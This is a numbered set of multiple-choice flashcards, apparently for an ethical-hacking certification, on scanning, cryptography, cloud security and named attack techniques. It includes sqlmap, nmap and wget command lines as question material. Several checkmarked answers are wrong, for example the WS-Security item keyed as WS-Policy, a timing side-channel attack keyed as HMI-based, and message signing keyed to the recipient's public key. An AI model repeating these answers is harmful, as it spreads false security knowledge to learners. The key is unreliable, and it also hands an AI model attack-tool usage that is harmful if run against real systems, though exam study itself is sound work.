  1. Which is the first step followed by Vulnerability Scanners for scanning a network?

Firewall detection
Checking if the remote host is alive
TCP / UDP Port scanning
OS Detection

A

Checking if the remote host is alive ✓

168
Q
  1. Jack, a professional hacker, targets an organization and performs vulnerability scanning on the target web server to identify
    any possible weaknesses, vulnerabilities, and misconfigurations. In this process, Jack uses an automated tool that eases his work
    and performs vulnerability scanning to find hosts, services, and other vulnerabilities in the target server.Which of the following
    tools is used by Jack to perform vulnerability scanning?

Infoga
WebCopier Pro
Netsparker
NCollector Studio

A

Netsparker ✓

169
Q
  1. Upon establishing his new startup, Tom hired a cloud service provider (CSP) but was dissatisfied with their service
    and wanted to move to another CSP. What part of the contract might prevent him from doing so?

Lock-up
Virtualization
Lock-in
Lock-down

A

Lock-in ✓

170
Q
  1. Kevin, an encryption specialist, implemented a technique that enhances the security of keys used for encryption and
    authentication. Using this technique, Kevin input an initial key to an algorithm that generated an enhanced key that is resistant to
    brute-force attacks.What is the technique employed by Kevin to improve the security of encryption keys?

Key derivation function
Key stretching
Public key infrastructure
Key reinstallation

A

Key stretching ✓

171
Q
  1. Stephen, an attacker, targeted the industrial control systems of an organization. He generated a fraudulent email with a
    malicious attachment and sent it to employees of the target organization. An employee who manages the sales software of the
    operational plant opened the fraudulent email and clicked on the malicious attachment. This resulted in the malicious attachment
    being downloaded and malware being injected into the sales software maintained in the victim’s system. Further, the malware
    propagated itself to other networked systems, finally damaging the industrial automation components.What is the attack technique
    used by Stephen to damage the industrial systems?

Reconnaissance attack
SMishing attack
Spear-phishing attack
HMI-based attack

A

Spear-phishing attack ✓

172
Q
  1. What type of virus is most likely to remain undetected by antivirus software?

Cavity virus
Stealth virus
Macro virus
File-extension virus

A

Stealth virus ✓

173
Q

174.
Rebecca, a security professional, wants to authenticate employees who use web services for safe and secure communication. In
this process, she employs a component of the Web Service Architecture, which is an extension of SOAP, and it can maintain the
integrity and confidentiality of SOAP messages.Which of the following components of the Web Service Architecture is used by
Rebecca for securing the communication?

WS-Policy
WSDL
WS-Work Processes
WS-Security

A

WS-Policy ✓

174
Q
  1. Peter, a system administrator working at a reputed IT firm, decided to work from his home and login remotely. Later, he
    anticipated that the remote connection could be exposed to session hijacking. To curb this possibility, he implemented a technique
    that creates a safe and encrypted tunnel over a public network to securely send and receive sensitive information and prevent
    hackers from decrypting the data flow between the endpoints.What is the technique followed by Peter to send files securely
    through a remote connection?

SMB signing
Switch network
VPN
DMZ

A

VPN ✓

175
Q
  1. Attacker Simon targeted the communication network of an organization and disabled the security controls of NetNTLMv1 by
    modifying the values of LMCompatibilityLevel, NTLMMinClientSec, and RestrictSendingNTLMTraffic. He then extracted all the nonnetwork
    logon tokens from all the active processes to masquerade as a legitimate user to launch further attacks. What is the type
    of attack performed by Simon?

Combinator attack
Dictionary attack
Rainbow table attack
Internal monologue attack

A

Internal monologue attack ✓

176
Q
  1. Thomas, a cloud security professional, is performing security assessment on cloud services to identify any loopholes. He
    detects a vulnerability in a bare-metal cloud server that can enable hackers to implant malicious backdoors in its firmware. He also
    identified that an installed backdoor can persist even if the server is reallocated to new clients or businesses that use it as an IaaS.
    What is the type of cloud attack that can be performed by exploiting the vulnerability discussed in the above scenario?

Man-in-the-cloud (MITC) attack
Cloudborne attack
Cloud cryptojacking
Metadata spoofing attack

A

Cloudborne attack ✓

177
Q
  1. Techno Security Inc. recently hired John as a penetration tester. He was tasked with identifying open ports in the target
    network and determining whether the ports are online and any firewall rule sets are encountered. John decided to perform a TCP
    SYN ping scan on the target network. Which of the following Nmap commands must John use to perform the TCP SYN ping scan?

nmap –sn –PA < target IP address >
nmap –sn –PS < target IP address >
nmap –sn –PP < target IP address >
nmap –sn –PO < target IP address >

A

nmap –sn –PS < target IP address > ✓

178
Q
  1. Tony wants to integrate a 128-bit symmetric block cipher with key sizes of 128, 192, or 256 bits into a software program, which
    involves 32 rounds of computational operations that include substitution and permutation operations on four 32-bit word blocks
    using 8- variable S-boxes with 4-bit entry and 4-bit exit. Which of the following algorithms includes all the above features and can
    be integrated by Tony into the software program?

CAST-128
Serpent
TEA
RC5

A

Serpent ✓

179
Q
  1. When considering how an attacker may exploit a web server, what is web server footprinting?

When an attacker creates a complete profile of the site’s external links and file structures
When an attacker uses a brute-force attack to crack a web-server password
When an attacker implements a vulnerability scanner to identify weaknesses
When an attacker gathers system-level data, including account details and server names

A

When an attacker creates a complete profile of the site’s external links and file structures ✓

180
Q
  1. Garry is a network administrator in an organization. He uses SNMP to manage networked devices from a remote location. To
    manage nodes in the network, he uses MIB, which contains formal descriptions of all network objects managed by SNMP. He
    accesses the contents of MIB by using a web browser either by entering the IP address and Lseries.mib or by entering the DNS
    library name and Lseries.mib. He is currently retrieving information from an MIB that contains object types for workstations and
    server services.Which of the following types of MIB is accessed by Garry in the above scenario?

MIB_II.MIB
LNMIB2.MIB
WINS.MIB

A

LNMIB2.MIB ✓

181
Q
  1. Bill has been hired as a penetration tester and cyber security auditor for a major credit card company.Which information
    security standard is most applicable to his role?

HITECH
Sarbanes–Oxley Act
PCI-DSS
FISMA

A

PCI-DSS ✓

182
Q
  1. Which among the following is the best example of the third step (delivery) in the cyber kill chain?

An intruder creates malware to be used as a malicious attachment to an email.
An intruder’s malware is triggered when a target opens a malicious email attachment.
An intruder’s malware is installed on a target’s machine.
An intruder sends a malicious attachment via email to a target.

A

An intruder sends a malicious attachment via email to a target. ✓

183
Q
  1. Sam, a web developer, was instructed to incorporate a hybrid encryption software program into a web application to secure
    email messages. Sam used an encryption software, which is a free implementation of the OpenPGP standard that uses both
    symmetric-key cryptography and asymmetric-key cryptography for improved speed and secure key exchange. What is the
    encryption software employed by Sam for securing the email messages?

SIMP
S/MIME
GPG (GnuPGP)
SMTP

A

GPG (GnuPGP) ✓

184
Q
  1. What useful information is gathered during a successful Simple Mail Transfer Protocol (SMTP) enumeration?

The internal command RCPT provides a list of ports open to message traffic.

A list of all mail proxy server addresses used by the targeted host

The two internal commands VRFY and EXPN provide a confirmation of valid users, email addresses, aliases, and mailing lists.

Reveals the daily outgoing message limits before mailboxes are locked

A

The two internal commands VRFY and EXPN provide a confirmation of valid users, email addresses, aliases, and mailing lists.✓

185
Q
  1. Mike, a security engineer, was recently hired by BigFox Ltd. The company recently experienced disastrous DoS attacks. The
    management had instructed Mike to build defensive strategies for the company’s IT infrastructure to thwart DoS/DDoS attacks.
    Mike deployed some countermeasures to handle jamming and scrambling attacks. What is the countermeasure Mike applied to
    defend against jamming and scrambling attacks?

Implement cognitive radios in the physical layer
Allow the usage of functions such as gets and strcpy
Allow the transmission of all types of addressed packets at the ISP level
Disable TCP SYN cookie protection

A

Implement cognitive radios in the physical layer ✓

186
Q
  1. Jude, a pen tester, examined a network from a hacker’s perspective to identify exploits and vulnerabilities accessible to the
    outside world by using devices such as firewalls, routers, and servers. In this process, he also estimated the threat of network
    security attacks and determined the level of security of the corporate network. What is the type of vulnerability assessment that Jude performed on the organization?

Host-based assessment
Passive assessment
External assessment
Application assessment

A

External assessment ✓

187
Q
  1. Jude, a pen tester working in Keiltech Ltd., performs sophisticated security testing on his company’s network infrastructure to
    identify security loopholes. In this process, he started to circumvent the network protection tools and firewalls used in the company.
    He employed a technique that can create forged TCP sessions by carrying out multiple SYN, ACK, and RST or FIN packets.
    Further, this process allowed Jude to execute DDoS attacks that can exhaust the network resources. What is the attack technique
    used by Jude for finding loopholes in the above scenario?

Ping-of-death attack
UDP flood attack
Spoofed session flood attack
Peer-to-peer attack

A

Spoofed session flood attack ✓

188
Q
  1. You have been authorized to perform a penetration test against a website. You want to use Google dorks to footprint the site
    but only want results that show file extensions. What Google dork operator would you use?

site
inurl
ext
filetype

A

filetype ✓

189
Q
  1. An attacker decided to crack the passwords used by industrial control systems. In this process, he employed a loop strategy to recover these passwords. He used one character at a time to check whether the first character entered is correct; if so, he continued the loop for consecutive characters. If not, he terminated the loop. Furthermore, the attacker checked how much time the device took to finish one complete password authentication process, through which he deduced how many characters entered are correct. What is the attack technique employed by the attacker to crack the passwords of the industrial control systems?

Buffer overflow attack
Side-channel attack
Denial-of-service attack
HMI-based attack

A

HMI-based attack ✓

190
Q
  1. According to the NIST cloud deployment reference architecture, which of the following provides connectivity and transport
    services to consumers?

Cloud provider
Cloud broker
Cloud connector
Cloud carrier

A

Cloud carrier ✓

191
Q
  1. After an audit, the auditors inform you that there is a critical finding that you must tackle immediately. You read the audit report, and the problem is the service running on port 389. Which service is this and how can you tackle the problem?

The service is LDAP, and you must change it to 636, which is LDAPS.
The service is NTP, and you have to change it from UDP to TCP in order to encrypt it.
The findings do not require immediate actions and are only suggestions.
The service is SMTP, and you must change it to SMIME, which is an encrypted way to send

A

The service is LDAP, and you must change it to 636, which is LDAPS. ✓

192
Q
  1. This type of injection attack does not show any error message. It is difficult to exploit as it returns information when the application is given SQL payloads that elicit a true or false response from the server. By observing the response, an attacker can extract sensitive information. What type of attack is this?

Blind SQL injection
Time-based SQL injection
Union SQL injection
Error-based SQL injection

A

Blind SQL injection ✓

193
Q
  1. In an attempt to damage the reputation of a competitor organization, Hailey, a professional hacker, gathers a list of employee and client email addresses and other related information by using various search engines, social networking sites, and web spidering tools. In this process, she also uses an automated tool to gather a list of words from the target website to further perform a brute-force attack on the previously gathered email addresses. What is the tool used by Hailey for gathering a list of words from the target website?

Psiphon
Shadowsocks
CeWL
Orbot

A

CeWL ✓

194
Q
  1. Becky has been hired by a client from Dubai to perform a penetration test against one of their remote offices. Working from her location in Columbus, Ohio, Becky runs her usual reconnaissance scans to obtain basic information about their network. When analyzing the results of her Whois search, Becky notices that the IP was allocated to a location in Le Havre, France. Which regional Internet registry should Becky go to for detailed information?

LACNIC
APNIC
ARIN
RIPE

A

RIPE ✓

195
Q
  1. Robert, a professional hacker, is attempting to execute a fault injection attack on a target IoT device. In this process, he injects faults into the power supply that can be used for remote execution, also causing the skipping of key instructions. He also injects faults into the clock network used for delivering a synchronized signal across the chip. Which of the following types of fault injection attack is performed by Robert in the above scenario?

Power/clock/reset glitching
Temperature attack
Frequency/voltage tampering
Optical, electromagnetic fault injection (EMFI)

A

Power/clock/reset glitching ✓

196
Q
197. Which type of attack attempts to overflow the content-addressable memory (CAM) table in an Ethernet switch?
MAC flooding 
Evil twin attack
DNS cache flooding
DDoS attack
A

MAC flooding ✓

197
Q
  1. Eric, a cloud security engineer, implements a technique for securing the cloud resources used by his organization. This technique assumes by default that a user attempting to access the network is not an authentic entity and verifies every incoming connection before allowing access to the network. Using this technique, he also imposed conditions such that employees can access only the resources required for their role. What is the technique employed by Eric to secure cloud resources?

Container technology
Serverless computing
Demilitarized zone
Zero trust network

A

Zero trust network ✓

198
Q
  1. Louis, a professional hacker, had used specialized tools or search engines to encrypt all his browsing activity and navigate anonymously to obtain sensitive/hidden information about official government or federal databases. After gathering the information, he successfully performed an attack on the target government organization without being traced. Which of the following techniques is described in the above scenario?

Dark web footprinting
VPN footprinting
VoIP footprinting
Website footprinting

A

VPN footprinting ✓

199
Q
  1. Given below are different steps involved in the vulnerability-management life cycle.
    1) Remediation
    2) identify assets and create a baseline
    3) Verification
    4) Monitor
    5) Vulnerability scan
    6) Risk assessment
    Identify the correct sequence of steps involved in vulnerability management.

1–>2–>3–>4–>5–>6
2–>4–>5–>3–>6–>1
2–>1–>5–>6–>4–>3
2–>5–>6–>1–>3–>4

A

2–>5–>6–>1–>3–>4 ✓

200
Q
  1. Jake, a professional hacker, installed spyware on a target iPhone to spy on the target user’s activities. He can take complete
    control of the target mobile device by jailbreaking the device remotely and record audio, capture screenshots, and monitor all
    phone calls and SMS messages. What is the type of spyware that Jake used to infect the target device?

Trident
Zscaler
Androrat
DroidSheep

A

Trident ✓

201
Q
  1. What information security law or standard aims at protecting stakeholders and the general public from accounting errors and
    fraudulent activities within organizations?

PCI-DSS
ISO/IEC 27001:2013
FISMA
SOX

A

SOX ✓

202
Q
  1. Which among the following is the best example of the hacking concept called “clearing tracks”?

An attacker gains access to a server through an exploitable vulnerability.
After a system is breached, a hacker creates a backdoor to allow re-entry into a system.
During a cyberattack, a hacker corrupts the event logs on all machines.
During a cyberattack, a hacker injects a rootkit into a server.

A

During a cyberattack, a hacker corrupts the event logs on all machines. ✓

203
Q
  1. Morris, an attacker, wanted to check whether the target AP is in a locked state. He attempted using different utilities to identify WPS-enabled APs in the target wireless network.Ultimately,he succeeded with one special command-line utility. Which of the following command-line utilities allowed Morris to discover the WPS- enabled APs?

net view
wash
macof
ntptrace

A

wash ✓

204
Q
  1. What would be the purpose of running “wget 192.168.0.15 -q -S” against a web server?

Performing content enumeration on the web server to discover hidden folders
Using wget to perform banner grabbing on the webserver
Downloading all the contents of the web page locally for further examination
Flooding the web server with requests to perform a DoS attack

A

Using wget to perform banner grabbing on the webserver ✓

205
Q
  1. Elante company has recently hired James as a penetration tester. He was tasked with performing enumeration
    on an organization’s network. In the process of enumeration, James discovered a service that is accessible to
    external sources. This service runs directly on port 21.
    What is the service enumerated by James in the above scenario?

Remote procedure call (RPC)
Network File System (NFS)
Border Gateway Protocol (BGP)
File Transfer Protocol (FTP)

A

File Transfer Protocol (FTP) ✓

206
Q
  1. What is the following command used for? sqlmap.py -u “http://10.10.1.20/?p=1&forumaction=search” –dbs

Enumerating the databases in the DBMS for the URL
Searching database statements at the IP address given
Creating backdoors using SQL injection
Retrieving SQL statements being executed on the database

A

Enumerating the databases in the DBMS for the URL ✓

207
Q
  1. You need to deploy a new web-based software package for your organization. The package requires three
    separate servers and needs to be available on the Internet.What is the recommended architecture in terms of server
    placement?

All three servers need to be placed internally
All three servers need to face the Internet so that they can communicate between themselves
A web server facing the Internet, an application server on the internal network, a database server on the internal network
A web server and the database server facing the Internet, an application server on the internal network

A

A web server facing the Internet, an application server on the internal network, a database server on the internal network

208
Q
  1. Joel, a professional hacker, targeted a company and identified the types of websites frequently visited by its
    employees. Using this information, he searched for possible loopholes in these websites and injected a malicious
    script that can redirect users from the web page and download malware onto a victim’s machine. Joel waits for the
    victim to access the infected web application so as to compromise the victim’s machine.
    Which of the following techniques is used by Joel in the above scenario?

Watering hole attack
MarioNet attack
DNS rebinding attack
Clickjacking attack

A

Watering hole attack ✓

209
Q
  1. John, a security analyst working for an organization, found a critical vulnerability on the organization’s LAN that allows him to view financial and personal information about the rest of the employees. Before reporting the vulnerability, he examines the information shown by the vulnerability for two days without disclosing any information to third parties or other internal employees. He does so out of curiosity about the other employees and may take advantage of this information later.
    What would John be considered as?

White hat
Gray hat
Black hat
Cybercriminal

A

Gray hat ✓

210
Q
  1. An incident investigator asks to receive a copy of the event logs from all firewalls, proxy servers, and Intrusion
    Detection Systems (IDS) on the network of an organization that has experienced a possible breach of security. When
    the investigator attempts to correlate the information in all of the logs, the sequence of many of the logged events
    do not match up. What is the most likely cause?

The network devices are not all synchronized.
Proper chain of custody was not observed while collecting the logs.
The attacker altered or erased events from the logs.
The security breach was a false positive.

A

The attacker altered or erased events from the logs. ✓

211
Q
  1. Harris is attempting to identify the OS running on his target machine. He inspected the initial TTL in the IP header and the related TCP window size and obtained the following results:
    TTL: 64
    Window Size: 5840
    What is the OS running on the target machine?

Mac OS
Linux OS
Solaris OS
Windows OS

A

Linux OS ✓

212
Q
  1. Mirai malware targets IoT devices. After infiltration, it uses them to propagate and create botnets that are then used to launch which types of attack?

Birthday attack
DDoS attack
MITM attack
Password attack

A

DDoS attack ✓

213
Q
  1. A post-breach forensic investigation revealed that a known vulnerability in Apache Struts was to blame for the Equifax data breach that affected 143 million customers. A fix was available from the software vendor for several months prior to the intrusion. This is likely a failure in which of the following security processes?

Secure development lifecycle
Patch management
Security awareness training
Vendor risk management

A

Patch management ✓

214
Q
  1. Which of the following Metasploit post-exploitation modules can be used to escalate privileges on Windows systems?

getsystem
autoroute
Getuid
keylogrecorder

A

getsystem ✓

215
Q
  1. Josh has finished scanning a network and has discovered multiple vulnerable services. He knows that several of these usually have protections against external sources but are frequently susceptible to internal users. He decides to draft an email, spoof the sender as the internal IT team, and attach a malicious file disguised as a financial spreadsheet. Before Josh sends the email, he decides to investigate other methods of getting the file onto the system. For this particular attempt, what was the last stage of the cyber kill chain that Josh performed?

Exploitation
Reconnaissance
Delivery
Weaponization

A

Weaponization ✓

216
Q
  1. Your company was hired by a small healthcare provider to perform a technical assessment on the network. What is the best approach for discovering vulnerabilities on a Windows-based computer?

Check MITRE.org for the latest list of CVE findings
Use the built-in Windows Update tool
Create a disk image of a clean Windows installation
Use a scan tool like Nessus

A

Use a scan tool like Nessus ✓

217
Q
  1. Geena, a cloud architect, uses a master component in the Kubernetes cluster architecture that scans newly generated pods and allocates a node to them. This component can also assign nodes based on factors such as the overall resource requirement, data locality, software/hardware/policy restrictions, and internal workload interventions.
    Which of the following master components is explained in the above scenario?

Kube-controller-manager
Etcd cluster
Kube-apiserver
Kube-scheduler

A

Kube-scheduler ✓

218
Q
  1. Ricardo has discovered the username for an application in his target’s environment. As he has a limited amount of time, he
    decides to attempt to use a list of common passwords he found on the Internet. He compiles them into a list and then feeds that list
    as an argument into his password-cracking application. What type of attack is Ricardo performing?

Known plaintext
Brute force
Dictionary
Password spraying

A

Dictionary ✓

219
Q
  1. Bob wants to ensure that Alice can check whether his message has been tampered with. He creates a checksum of the
    message and encrypts it using asymmetric cryptography.
    What key does Bob use to encrypt the checksum for accomplishing this goal?

His own private key
Alice’s private key
Alice’s public key
His own public key

A

Alice’s public key ✓

220
Q
  1. Dayn, an attacker, wanted to detect if any honeypots are installed in a target network. For this purpose, he used a time-based TCP fingerprinting method to validate the response to a normal computer and the response of a honeypot to a manual SYN request. Which of the following techniques is employed by Dayn to detect honeypots?

Detecting the presence of Sebek-based honeypots
Detecting the presence of Snort_inline honeypots
Detecting honeypots running on VMware
Detecting the presence of Honeyd honeypots

A

Detecting the presence of Honeyd honeypots ✓

221
Q
  1. A group of hackers were roaming around a bank office building in a city, driving a luxury car. They were using hacking tools on their laptop with the intention to find a free- access wireless network. What is this hacking process known as?

Wardriving
GPS mapping
Wireless sniffing
Spectrum analysis

A

Wardriving ✓

222
Q

223.Henry is a penetration tester who works for XYZ organization. While performing enumeration on a client organization, he queries the DNS server for a specific cached DNS record. Further, by using this cached record, he determines the sites recently visited by the organization’s user. What is the enumeration technique used by Henry on the organization?

DNS cache snooping
DNS cache poisoning
DNSSEC zone walking
DNS zone walking

A

DNS cache snooping ✓

223
Q
  1. Miley, a professional hacker, decided to attack a target organization’s network. To perform the attack, she used a tool to send fake ARP messages over the target network to link her MAC address with the target system’s IP address. By performing this, Miley received messages directed to the victim’s MAC address and further used the tool to intercept, steal, modify, and block sensitive communication to the target system. What is the tool employed by Miley to perform the above attack?

BetterCAP
DerpNSpoof
Gobbler
Wireshark

A

BetterCAP ✓

224
Q
  1. Gregory, a professional penetration tester working at Sys Security Ltd., is tasked with performing a security test of web applications used in the company. For this purpose, Gregory uses a tool to test for any security loopholes by hijacking a session between a client and server. This tool has a feature of intercepting proxy that can be used to inspect and modify the traffic between the browser and target application. This tool can also perform customized attacks and can be used to test the randomness of session tokens.
    Which of the following tools is used by Gregory in the above scenario?

Nmap
CxSAST
Wireshark
Burp Suite

A

Burp Suite ✓